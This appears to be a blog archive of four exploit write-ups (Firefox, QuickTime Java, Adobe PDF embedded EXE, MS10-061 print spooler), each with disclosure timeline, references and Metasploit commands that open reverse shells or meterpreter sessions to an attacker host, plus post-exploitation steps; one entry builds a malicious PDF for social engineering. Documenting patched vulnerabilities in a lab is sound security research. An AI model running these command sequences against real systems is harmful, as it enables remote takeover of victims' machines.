Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

CVE-2006-3677 : Mozilla Suite/Firefox Navigator Object Code Execution

Exploits, Metasploit,

Timeline :

Vulnerability reported to ZDI by Anonymous
Vulnerability reported to the vendor by ZDI the 2006-06-16
Coordinated vulnerability disclosure the 2006-07-26
PoC provided by hdm the 2006-07-27
Metasploit PoC provided the 2006-07-30

    PoC provided by :

hdm

    Reference(s) :

CVE-2006-3677
MFSA 2006-45
ZDI-06-025

    Affected version(s) :

Version previous Firefox 1.5.0.5

    Tested on Windows XP SP3 with :

    Firefox 1.5.0.4

    Description :

This module exploits a code execution vulnerability in the Mozilla Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit requires the Java plugin to be installed.

    Commands :

use exploit/multi/browser/mozilla_navigatorj­ava
set SRVHOST 192.168.178.21
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2007-2175 : Apple QTJava toQTPointer() Arbitrary Memory Access

Exploits, Metasploit,

Timeline :

Vulnerability discovered by Shane Macaulay & Dino Dai Zovi during CanSecWest 2007
Vulnerability reported to ZDI by Dino A. Dai Zovi & Shane Macaulay
Vulnerability reported to the vendor by ZDI the 2007-04-23
Coordinated vulnerability disclosure the 2007-05-01
Metasploit PoC provided the 2007-05-29

    PoC provided by :

hdm
kf
ddz

    Reference(s) :

CVE-2007-2175
ZDI-07-023

    Affected version(s) :

QuickTime 7 previous version 7.1.6 for Windows and OS X

    Tested on Windows XP SP3 with :

    QuickTime 7.1.5

    Description :

This module exploits an arbitrary memory access vulnerability in the Quicktime for Java API provided with Quicktime 7.

    Commands :

use exploit/multi/browser/qtjava_pointer
set SRVHOST 192.168.178.21
set TARGET 0
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2010-1240 : Adobe PDF Embedded EXE Social Engineering

Exploits, Metasploit, ,

Timeline :

Vulnerability discovered & disclosed by Didier Stevens the 2010-03-29
Exploit-DB PoC provided by Didier Stevens the 2010-03-31

    PoC provided by :

jduck
Colin Ames

    Reference(s) :

CVE-2010-1240
EDB-ID-11987

    Affected version(s) :

Adobe Reader 9.3.2 and earlier versions for Windows, Macintosh, and UNIX
Adobe Acrobat 9.3.2 and earlier versions for Windows and Macintosh4

    Tested on Windows XP SP3 with :

    Adobe Reader 9.3.0

    Description :

This module embeds a Metasploit payload into an existing PDF file. The resulting PDF can be sent to a target as part of a social engineering attack.

    Commands :

use exploit/windows/fileformat/adobe_pdf_emb­edded_exe
set OUTPUTPATH /home/eromang
set INFILENAME metasploit.pdf
set TARGET 0
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.178.21
expoit -j

sessions -i 1
dir

MS10-061 : Microsoft Print Spooler Service Impersonation Vulnerability

Exploits, Metasploit, ,

Timeline :

Vulnerability exploited by the StuxNet worm
Security update released by Microsoft (KB2347290) the 2010-09-14
Metasploit PoC released the 2010-09-17

    PoC provided by :

jduck
hdm

    Reference(s) :

CVE-2010-2729
MS10-061

    Affected version(s) :

Windows XP SP3
Windows XP Professional x64 SP2
Windows Server 2003 SP2
Windows Server 2003 x64 SP2
Windows Vista SP1 and Windows Vista SP2
Windows Vista x64 SP1 and Windows Vista x64 SP2
Windows Server 2008 32 and Windows Server 2008 32 SP2
Windows Server 2008 x64 and Windows Server 2008 x64 SP2
Windows 7 32
Windows 7 x64
Windows Server 2008 R2 x64

    Tested on Windows XP SP3

    Description :

This module exploits the RPC service impersonation vulnerability detailed in Microsoft Bulletin MS10-061. By making a specific DCE RPC request to the StartDocPrinter procedure, an attacker can impersonate the Printer Spooler service to create a file. The working directory at the time is %SystemRoot%\system32. An attacker can specify any file name, including directory traversal or full paths. By sending WritePrinter requests, an attacker can fully control the content of the created file. In order to gain code execution, this module writes an EXE and then (ab)uses the impersonation vulnerability a second time to create a secondary RPC connection to the \PIPE\ATSVC named pipe. We then proceed to create a remote AT job using a blind NetrJobAdd RPC call.

    Commands :

use exploit/windows/smb/ms10_061_spoolss
nmap 192.168.178.41
set RHOST 192.168.178.41
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
getuid
sysinfo
ipconfig